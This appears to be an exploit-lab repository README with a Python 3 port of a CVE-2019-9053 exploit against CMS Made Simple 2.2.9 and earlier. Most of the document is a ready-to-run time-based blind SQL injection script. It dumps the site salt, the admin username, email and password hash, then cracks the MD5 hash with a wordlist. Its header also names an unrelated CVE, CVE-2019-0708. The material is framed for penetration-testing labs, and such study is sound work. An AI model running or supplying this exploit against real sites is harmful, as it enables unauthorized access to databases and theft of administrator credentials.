Exploits Python cve-2019-9053 – by HackHeart
# -exploit-lab
Exploits Python cve-2019-0708 – by HackHeart
🧠 Code Review & Porting - Python 2 → Python 3
This exploit was originally written in Python 2, which modern systems no longer ship or support. To keep the tooling usable going forward, the whole codebase has been reviewed and migrated to Python 3.
🔧 Key improvements during the port:
Updated print statements to Python 3 syntax
Replaced raw_input() with input()
Adapted socket operations to handle byte/str properly (.decode() added)
Removed deprecated methods like xrange() and .iteritems()
Validated script compatibility with Python 3.8+ and modern Linux distros
🛡️ This version maintains the exploit logic intact while ensuring:
Compatibility with modern OSCP / Red Team labs
Cleaner, safer, and more readable syntax
Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)
#!/usr/bin/env python3
# CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection
import requests
import time
import argparse
import hashlib
# --- CLI and module-level state -------------------------------------------
# Flat procedural PoC: everything defined here is read by dump_field()
# (dictionary, TIME, url_vuln, session) or mutated by it (flag).
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")
args = parser.parse_args()
# Request URL for the News module interface; dump_field() appends the
# m1_idlist parameter (the injection point) to this string per request.
url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
# Candidate alphabet for the character-by-character extraction. A stored
# value containing a character outside this set is truncated at that
# position, because dump_field() stops when no candidate matches.
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
# Seconds passed to SLEEP() and also the response-time threshold compared
# against in dump_field(); the two are deliberately the same value.
TIME = 1
# Loop control for dump_field(). It is left False when the function returns
# and is reset to True by the caller before every extraction below.
flag = True
salt = ''
username = ''
email = ''
password_hash = ''
output = ""
def dump_field(field_name: str, table: str, column: str, condition: str) -> str:
    """Recover one column value by time-based blind SQL injection, one character at a time.

    Each pass over ``dictionary`` extends the known prefix by one character: the
    candidate prefix is hex-encoded and compared with ``LIKE 0x<prefix>25``
    (0x25 is ``%``, so this is a prefix match) inside a ``SELECT SLEEP(TIME)``
    subquery. A request that takes at least ``TIME`` seconds is taken as a hit.
    The function returns when a full pass finds no matching candidate.

    Args:
        field_name: Label only; it is not used anywhere in the body.
        table: Table name spliced verbatim into the query.
        column: Column whose value is being recovered.
        condition: Extra ``WHERE`` clause, already URL-shaped (``+`` for spaces).

    Returns:
        The recovered prefix (possibly empty if the first pass never matches).

    Side effects:
        Reads and writes the module global ``flag``; it is False on return, so
        callers re-arm it before the next extraction. Every candidate costs one
        HTTP GET whose query string carries the raw SLEEP() payload, so the
        full probe sequence is visible in the server's access logs.
    """
    global flag
    result = ""
    ord_result = ""
    while flag:
        flag = False
        for char in dictionary:
            temp_result = result + char
            # Hex-encode the candidate prefix so it can be written as a 0x literal.
            ord_temp_result = ord_result + format(ord(char), "x")
            print(f"[*] Trying {temp_result}")
            # '+' stands for a space; presumably decoded server-side as a space.
            payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
            start_time = time.time()
            session.get(url_vuln + "&m1_idlist=" + payload)
            # Response time is the only oracle: a round trip that is slow for
            # reasons other than SLEEP() is counted as a match too.
            if time.time() - start_time >= TIME:
                result = temp_result
                ord_result = ord_temp_result
                flag = True
                break
    return result
# --- Extraction -----------------------------------------------------------
# Four blind extractions, one per field. `flag` is re-armed before each call
# because dump_field() leaves it False when it finishes.
print("[+] Extracting salt...")
flag = True
# cms_siteprefs row whose sitepref_name matches 0x736974656d61736b ("sitemask").
salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b")
output += f"Salt: {salt}\n"
print("[+] Extracting username...")
flag = True
# The remaining fields come from the cms_users row with user_id matching 0x31 ("1").
username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31")
output += f"Username: {username}\n"
print("[+] Extracting email...")
flag = True
email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31")
output += f"Email: {email}\n"
print("[+] Extracting password hash...")
flag = True
password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31")
output += f"Hash: {password_hash}\n"
# --- Optional offline hash check ------------------------------------------
# Runs only when both -c and -w are given; -c without -w is silently skipped.
if args.crack and args.wordlist:
    print("[+] Cracking password...")
    # errors='ignore' drops undecodable bytes instead of aborting on a
    # non-UTF-8 wordlist line.
    with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
        for line in f:
            word = line.strip()
            print(f"[*] Trying password: {word}")
            # Assumes the stored hash is md5(salt + password) — a single fast
            # digest, which is why a plain wordlist pass is feasible at all.
            if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
                output += f"[+] Password cracked: {word}\n"
                break
print("\n=== Exploit Results ===")
print(output)
[4.0K] /data/pocs/09899c31d7e3c938326af9c8d2933276160ca66c
├── [2.6K] cve_2019_9053_python3.py
└── [3.5K] README.md
0 directories, 2 files